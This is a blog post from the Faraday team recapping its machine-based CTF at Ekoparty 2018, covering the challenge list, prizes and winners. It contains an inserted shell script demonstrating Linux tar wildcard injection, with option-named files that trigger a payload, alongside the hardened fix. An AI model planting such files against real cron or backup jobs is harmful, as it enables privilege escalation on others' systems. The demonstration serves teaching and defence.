Faraday CTF at Ekoparty 2018


Another year, another ekoparty has passed, and once again we ran a CTF, this time with some changes with respect to last year's version (have you read it?).

This time we decided to leave the Jeopardy style behind and move to a format similar to HackTheBox, with real machines hosting the challenges.

Each machine holds two flags, stored as '.txt' files:

 - The first flag, owned by a normal OS user.
 - The second flag, owned by the root OS user.

The challenges varied in difficulty, ranging from regular web application challenges to reversing, exploitation and crypto.

The prizes
This time, we gave out these prizes:

 1 - Nintendo Switch
 2 - Portable TP-Link router and an Arduino with a Wi-Fi module.
 3 - An Arduino with a Wi-Fi module and a T-shirt.

The challenges
We have played a number of CTFs over the past few years and found that the Jeopardy style is not our favorite, so we decided to change it for our own CTF. We tried to innovate with something different, implementing a scenario very similar to a pentest, where the objectives were clear:

  •  Every challenge is based on a real-world vulnerability.
  •  We deploy several challenges on which players can demonstrate their skills in web applications, OS security, reversing and crypto.
  •  To demonstrate the knowledge and technique used to solve each challenge, players must send us a writeup.
  •  Something really important to keep in mind: each challenge runs on a single machine shared by all participants, so everyone must erase all traces of their work so as not to hand the solution to other players.

The following list shows the name of each machine, with the different challenges on them:

Challenge    Severity  User Vulnerability                 Root Vulnerability
PICHONAITO   EASY      Firewall Bypass + File Upload      Sudo without password
POLAK        EASY      Serialization + Command Injection  Process hijacking
EZE          MEDIUM    File Disclosure + SSRF             Buffer Overflow
MARTA        MEDIUM    Padding Oracle + LFI               Linux Wildcard Injection
FRUTISHITA   HARD      Race Condition + File Upload       Server Side Template Injection
SSS          HARD      Brainfuck                          Buffer Overflow + Crypto
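The root vector listed for MARTA, Linux wildcard injection, is worth seeing end to end because the bug lives in one unquoted character. The script below is an added example, not code from the original post or from the CTF machines: it assumes a backup job running `tar cf backup.tar *` from inside a directory the attacker can write to (a constructed scenario, not MARTA's actual setup) and GNU tar, whose --checkpoint options are the usual abuse path. It runs the attack, then the one-character fix, and reports the result of each.

```shell
#!/bin/sh
# Added example, not code from the Faraday CTF post: a self-contained
# demonstration of the Linux wildcard injection class listed for MARTA.
# The scenario (a backup job running `tar cf backup.tar *` inside a
# directory an attacker can write to) is constructed for illustration and
# is an assumption, not the actual MARTA machine's configuration.
# Requires GNU tar: --checkpoint and --checkpoint-action are GNU extensions.
set -u

# Build a scratch directory holding one ordinary file, an attacker payload,
# and two empty files whose NAMES are tar options. Prints the directory path.
make_victim_dir() {
    dir=$(mktemp -d)
    echo "ordinary data" > "$dir/notes.txt"
    # Payload: a real attacker would spawn a shell or add a sudoers entry;
    # here it only drops a marker file so the outcome can be checked.
    printf '#!/bin/sh\necho owned > "%s/pwned"\n' "$dir" > "$dir/payload.sh"
    # When '*' expands, these two names reach tar as arguments and, because
    # GNU tar permutes options, are parsed as options rather than file names.
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh payload.sh"
    printf '%s\n' "$dir"
}

# Echoes "exploited" if the attacker's marker exists, "safe" otherwise.
check_result() {
    if [ -f "$1/pwned" ]; then echo exploited; else echo safe; fi
}

# Vulnerable job: an unanchored '*' lets file names become tar options.
# --checkpoint=1 fires on every record written, and the checkpoint action
# runs 'sh payload.sh' through /bin/sh -c in the same working directory.
vulnerable_backup() {
    rm -f "$1/pwned"
    (cd "$1" && tar cf "$1.tar" *) >/dev/null 2>&1 || true
    check_result "$1"
}

# Hardened job: anchoring the glob as './*' makes every expanded name start
# with "./", which tar can only treat as a path. Ending option parsing with
# '--' before the glob (tar cf "$1.tar" -- *) works as well.
hardened_backup() {
    rm -f "$1/pwned"
    (cd "$1" && tar cf "$1.tar" ./*) >/dev/null 2>&1 || true
    check_result "$1"
}

cleanup_victim_dir() {
    rm -rf "$1" "$1.tar"
}

# Stand-alone run: show both outcomes side by side.
victim=$(make_victim_dir)
echo "unanchored '*' : $(vulnerable_backup "$victim")"
echo "anchored './*' : $(hardened_backup "$victim")"
cleanup_victim_dir "$victim"
```

The same pattern applies to any tool that takes options after positional arguments (chown --reference, rsync -e, and so on); the fix is always the same: never let a glob be the first thing the tool sees without './' or '--' in front of it.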

Teams
This year we had many more teams playing than last year: 45 teams registered, of which 15 were active.

The first positions were:
- SecSignal
- FzFz
- 3xG

However, for reasons beyond our control, the following happened:

The FzFz team notified us that they could not collect the prize, so they ceded their position to the next competitor.
The Amnesia team, originally 4th (and therefore 3rd after FzFz withdrew), did not send us a writeup, so they lost their position, and RLTEAM (originally 5th), who did send a writeup, took 3rd place.

So, with these changes, the winners were:
- SecSignal
- 3xG
- RLTEAM

Finally, we want to thank user 'L', who found a bug in our platform and decided to report it rather than take advantage of it. Within the CTF we granted him a mention and an extra flag for his attitude.

We are very happy with the CTF we ran this year, and want to thank everyone who came with questions, played it and/or helped us with the organization. We hope you enjoyed it as much as or more than we did!

We are coming back next year!
Are you?

Faraday Team

https://www.faradaysec.com
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
